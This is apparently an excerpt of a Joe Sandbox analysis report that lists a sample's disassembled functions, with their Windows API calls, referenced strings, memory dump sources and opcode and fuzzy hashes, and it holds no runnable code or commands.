Instruction Fuzzy Hash: 2781FA71664219BBDB24BF60DC46FBE37A8EF15340F044025FE09AA1D6EB70D961CBA1

Function 00255A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00255A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00255A40
SetWindowTextW.USER32(?,?), ref: 00255A57
GetDlgItem.USER32(?,000003EA), ref: 00255A6C
SetWindowTextW.USER32(00000000,?), ref: 00255A72
GetDlgItem.USER32(?,000003E9), ref: 00255A82
SetWindowTextW.USER32(00000000,?), ref: 00255A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00255AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00255AC3
GetWindowRect.USER32(?,?), ref: 00255ACC
_wcslen.LIBCMT ref: 00255B33
SetWindowTextW.USER32(?,?), ref: 00255B6F
GetDesktopWindow.USER32 ref: 00255B75
GetWindowRect.USER32(00000000), ref: 00255B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00255BD3
GetClientRect.USER32(?,?), ref: 00255BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 00255C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00255C2F

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 17c0cb240d9954a49a4d7a7c406105c9341cf9e981efa2bda9c2068d7d842f78
Instruction ID: fc476e75867d1d92456d7b4c91c62a397e0cd0b240a445a876950e3fcd1b8eb9
Opcode Fuzzy Hash: 17c0cb240d9954a49a4d7a7c406105c9341cf9e981efa2bda9c2068d7d842f78
Instruction Fuzzy Hash: C271CF31910B16EFCB20DFA8CE99A6EBBF5FF48705F100528E542A25A0D774E918CF64

Function 002530F7 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0025318D
_wcslen.LIBCMT ref: 002531F8

Strings

INSTANCE, xrefs: 00253453
REGEXPCLASS, xrefs: 00253255, 00253266
CLASS, xrefs: 00253188, 002531A5
TEXT, xrefs: 0025347C
CLASSNN, xrefs: 002531F3, 00253204
NAME, xrefs: 00253335, 00253346
[+, xrefs: 0025339A

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[+
API String ID: 176396367-1283632702
Opcode ID: 5527600d0fe0c09bfd169f9e437e020863c427443b783d7e6a13cf17bdb7d0b4
Instruction ID: a2ad3c2bf01503dbfce288ebe0d346e14239b1ad255817e86e6b68f76cbabb61
Opcode Fuzzy Hash: 5527600d0fe0c09bfd169f9e437e020863c427443b783d7e6a13cf17bdb7d0b4
Instruction Fuzzy Hash: 85E1F532A20516ABCB14DF78C4417FDBBB0BF14791F649119EC56E7240DB30AEAD8B94

Function 002100C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 002100C6

Part of subcall function 002100ED: InitializeCriticalSectionAndSpinCount.KERNEL32(002C070C,00000FA0,552A3297,?,?,?,?,002323B3,000000FF), ref: 0021011C
Part of subcall function 002100ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,002323B3,000000FF), ref: 00210127
Part of subcall function 002100ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,002323B3,000000FF), ref: 00210138
Part of subcall function 002100ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0021014E
Part of subcall function 002100ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0021015C
Part of subcall function 002100ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0021016A
Part of subcall function 002100ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00210195
Part of subcall function 002100ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 002101A0

___scrt_fastfail.LIBCMT ref: 002100E7

Part of subcall function 002100A3: __onexit.LIBCMT ref: 002100A9

Strings

InitializeConditionVariable, xrefs: 00210148
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00210122
SleepConditionVariableCS, xrefs: 00210154
kernel32.dll, xrefs: 00210133
WakeAllConditionVariable, xrefs: 00210162

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: ec7edc863331771740de25076496bc26618a2e3d1501c6a00efdd0623fcaa39c
Instruction ID: c5155d42342318891f6954d37e73423eea722d2b41999799ba7546d108fb207d
Opcode Fuzzy Hash: ec7edc863331771740de25076496bc26618a2e3d1501c6a00efdd0623fcaa39c
Instruction Fuzzy Hash: 8D213736662301EBD7106B64BD8DFAA73D4EB19B51F200129F905E22D1DBF498A08BA0

Function 002644C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,0028CC08), ref: 00264527
_wcslen.LIBCMT ref: 0026453B
_wcslen.LIBCMT ref: 00264599
_wcslen.LIBCMT ref: 002645F4
_wcslen.LIBCMT ref: 0026463F
_wcslen.LIBCMT ref: 002646A7

Part of subcall function 0020F9F2: _wcslen.LIBCMT ref: 0020F9FD

GetDriveTypeW.KERNEL32(?,002B6BF0,00000061), ref: 00264743

Strings

all, xrefs: 00264531, 00264536
removable, xrefs: 002645EA, 002645EF
ramdisk, xrefs: 002646F1
unknown, xrefs: 00264708
fixed, xrefs: 00264635, 0026463A
cdrom, xrefs: 0026458F, 00264594
network, xrefs: 0026469D, 002646A2

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 99cdf2a0a5f4fa9c774e83a6f96bffe4af6eee13f8a5802ad1579ada298f2a28
Instruction ID: afb272f43ef4358440eb59f57741ec6d9ee1e6a7cf1da7bb5ceba05495ebbe1a
Opcode Fuzzy Hash: 99cdf2a0a5f4fa9c774e83a6f96bffe4af6eee13f8a5802ad1579ada298f2a28
Instruction Fuzzy Hash: 5DB1F0716283029FC710EF28C890A7AB7E5AFA5764F50491DF5D6C7291D730D8A4CBA2

Function 0028911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00209BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00209BB2

DragQueryPoint.SHELL32(?,?), ref: 00289147

Part of subcall function 00287674: ClientToScreen.USER32(?,?), ref: 0028769A
Part of subcall function 00287674: GetWindowRect.USER32(?,?), ref: 00287710
Part of subcall function 00287674: PtInRect.USER32(?,?,00288B89), ref: 00287720

SendMessageW.USER32(?,000000B0,?,?), ref: 002891B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 002891BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 002891DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00289225
SendMessageW.USER32(?,000000B0,?,?), ref: 0028923E
SendMessageW.USER32(?,000000B1,?,?), ref: 00289255
SendMessageW.USER32(?,000000B1,?,?), ref: 00289277
DragFinish.SHELL32(?), ref: 0028927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00289371

Strings

@GUI_DRAGID, xrefs: 002892E9
p#,, xrefs: 002892BB
@GUI_DRAGFILE, xrefs: 00289320
@GUI_DROPID, xrefs: 0028929E

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#,
API String ID: 221274066-1116815550
Opcode ID: 131d4d6fd4dd0247e0cfd3a17b1a89f89b25f56fc7143c274685e8e6b9ae2fac
Instruction ID: 5539e4ba1f5e810056bfa19ded9f15da3319bf004b243c620420064314481e28
Opcode Fuzzy Hash: 131d4d6fd4dd0247e0cfd3a17b1a89f89b25f56fc7143c274685e8e6b9ae2fac
Instruction Fuzzy Hash: 72619D71109305AFC705EF54DC89EAFBBE8EF99350F100A2DF596921A1DB309A58CB62

Function 0027AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0027B198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0027B1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0027B1D4
_wcslen.LIBCMT ref: 0027B200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0027B214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0027B236
_wcslen.LIBCMT ref: 0027B332

Part of subcall function 002605A7: GetStdHandle.KERNEL32(000000F6), ref: 002605C6

_wcslen.LIBCMT ref: 0027B34B
_wcslen.LIBCMT ref: 0027B366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0027B3B6
GetLastError.KERNEL32(00000000), ref: 0027B407
CloseHandle.KERNEL32(?), ref: 0027B439
CloseHandle.KERNEL32(00000000), ref: 0027B44A
CloseHandle.KERNEL32(00000000), ref: 0027B45C
CloseHandle.KERNEL32(00000000), ref: 0027B46E
CloseHandle.KERNEL32(?), ref: 0027B4E3

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 64bbb815a14c33554235f3dd454912e01094bdf7debac30f8734914165196c8e
Instruction ID: faeabd4a206967f839b79ab566823d52157073071516262fff0f04ae94154fa9
Opcode Fuzzy Hash: 64bbb815a14c33554235f3dd454912e01094bdf7debac30f8734914165196c8e
Instruction Fuzzy Hash: 06F1BC316283419FC725EF24C891B6FBBE1AF85314F14855DF9998B2A2CB31EC54CB92

Function 001F326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(002C1990), ref: 00232F8D
GetMenuItemCount.USER32(002C1990), ref: 0023303D
GetCursorPos.USER32(?), ref: 00233081
SetForegroundWindow.USER32(00000000), ref: 0023308A
TrackPopupMenuEx.USER32(002C1990,00000000,?,00000000,00000000,00000000), ref: 0023309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 002330A9

Strings

0, xrefs: 001F327D

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: e3cd748e53b83585663af8cf3a1353f36260fafdd76e1e62a32e07fe1e6920da
Instruction ID: 267010a245ce32e58695937e3c91c47d68277dfb70a467b3ef43fa41871240c1
Opcode Fuzzy Hash: e3cd748e53b83585663af8cf3a1353f36260fafdd76e1e62a32e07fe1e6920da
Instruction Fuzzy Hash: 23713AB065020AFEEB259F64DC49FAABF64FF01364F204216F6246A1E1C7B1AD24CB50

Function 00286CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00286DEB

Part of subcall function 001F6B57: _wcslen.LIBCMT ref: 001F6B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00286E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00286E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00286E94
DestroyWindow.USER32(?), ref: 00286EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,001F0000,00000000), ref: 00286EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00286EFD
GetDesktopWindow.USER32 ref: 00286F16
GetWindowRect.USER32(00000000), ref: 00286F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00286F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00286F4D

Part of subcall function 00209944: GetWindowLongW.USER32(?,000000EB), ref: 00209952

Strings

tooltips_class32, xrefs: 00286E58, 00286EDD
0, xrefs: 00286D98

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: dce03618f2da455e92b8ca7b1368c342d7e05fb86522d778db5cc98b6b1e86f1
Instruction ID: d147969cdcb421b392cd6cc5441c5c51dfd45c9d18d0d31da8800dbc17a15987
Opcode Fuzzy Hash: dce03618f2da455e92b8ca7b1368c342d7e05fb86522d778db5cc98b6b1e86f1
Instruction Fuzzy Hash: F8718978115245AFDB25DF18EC4CFAABBE9FB99300F14041DFA89872A1D770E925CB21

Function 0026C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0026C4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0026C4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0026C4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0026C4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0026C533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0026C549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0026C554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0026C584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0026C5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0026C5F0
InternetCloseHandle.WININET(00000000), ref: 0026C5FB

Strings

, xrefs: 0026C575

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 2c960e1d2cb89efec653499fcf6c3c3199ae32ffb96c441f9669022ab8d87df3
Instruction ID: 394e4da628ad4dd54fd00e5a417703e81ee71c665e5a9f6953a310fb2b0f9756
Opcode Fuzzy Hash: 2c960e1d2cb89efec653499fcf6c3c3199ae32ffb96c441f9669022ab8d87df3
Instruction Fuzzy Hash: 47516EB4510209BFDB21AF60DD48ABB7BBCFB08354F20441AF98696250DB34E9949F60

Function 0028856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00288592
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002885A2
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002885AD
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002885BA
GlobalLock.KERNEL32(00000000), ref: 002885C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002885D7
GlobalUnlock.KERNEL32(00000000), ref: 002885E0
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002885E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002885F8
OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,0028FC38,?), ref: 00288611
GlobalFree.KERNEL32(00000000), ref: 00288621
GetObjectW.GDI32(?,00000018,?), ref: 00288641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00288671
DeleteObject.GDI32(?), ref: 00288699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 002886AF

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: c90b3da833dff97c235cf552376c3d176caf8f12bd44852860389dc7784fcff4
Instruction ID: f31eaa705892a36f427b7675235eef156848a10d7630e1abdf84e9c36a6b1851
Opcode Fuzzy Hash: c90b3da833dff97c235cf552376c3d176caf8f12bd44852860389dc7784fcff4
Instruction Fuzzy Hash: F2412C79602205AFDB11DF65DC8CEAA7BBDFF89711F504058F905E7291DB709901DB20

Function 002614BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00261502
VariantCopy.OLEAUT32(?,?), ref: 0026150B
VariantClear.OLEAUT32(?), ref: 00261517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 002615FB
VarR8FromDec.OLEAUT32(?,?), ref: 00261657
VariantInit.OLEAUT32(?), ref: 00261708
SysFreeString.OLEAUT32(?), ref: 0026178C
VariantClear.OLEAUT32(?), ref: 002617D8
VariantClear.OLEAUT32(?), ref: 002617E7
VariantInit.OLEAUT32(00000000), ref: 00261823

Strings

Default, xrefs: 002616AF
%4d%02d%02d%02d%02d%02d, xrefs: 00261625

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: 863b7c3e9f7d0d5aad7c549c950609a2bbf22b896890f4500c4682854de46563
Instruction ID: 5f38a79d36c8674ec6beda90266d19759c0dbe522dfd462998ff97db90974caa
Opcode Fuzzy Hash: 863b7c3e9f7d0d5aad7c549c950609a2bbf22b896890f4500c4682854de46563
Instruction Fuzzy Hash: 09D1F272A20205DBDB10AF65E885B79F7B5BF45700F688056E407AB581EB70FCB0DBA1

Function 0027B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 001F9CB3: _wcslen.LIBCMT ref: 001F9CBD

Part of subcall function 0027C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0027B6AE,?,?), ref: 0027C9B5
Part of subcall function 0027C998: _wcslen.LIBCMT ref: 0027C9F1
Part of subcall function 0027C998: _wcslen.LIBCMT ref: 0027CA68
Part of subcall function 0027C998: _wcslen.LIBCMT ref: 0027CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0027B6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0027B772
RegDeleteValueW.ADVAPI32(?,?), ref: 0027B80A
RegCloseKey.ADVAPI32(?), ref: 0027B87E
RegCloseKey.ADVAPI32(?), ref: 0027B89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 0027B8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0027B904
RegDeleteKeyW.ADVAPI32(?,?), ref: 0027B922
FreeLibrary.KERNEL32(00000000), ref: 0027B983
RegCloseKey.ADVAPI32(00000000), ref: 0027B994

Strings

RegDeleteKeyExW, xrefs: 0027B8FE
advapi32.dll, xrefs: 0027B8ED

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: 5d0daf7fc85519f91b48f8ee189d94b0380c053f0257b32e99303f7a2887232c
Instruction ID: c70b31cd400c1f45cf8284b8d78a4854f547a38ed5bf771effc36aa349ef5b75
Opcode Fuzzy Hash: 5d0daf7fc85519f91b48f8ee189d94b0380c053f0257b32e99303f7a2887232c
Instruction Fuzzy Hash: AAC17C35214202EFD715DF24C495F2ABBE5BF84318F14C45CE5AA8B2A2CB71EC55CB92

Function 0027255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 002725D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 002725E8
CreateCompatibleDC.GDI32(?), ref: 002725F4
SelectObject.GDI32(00000000,?), ref: 00272601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0027266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 002726AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 002726D0
SelectObject.GDI32(?,?), ref: 002726D8
DeleteObject.GDI32(?), ref: 002726E1
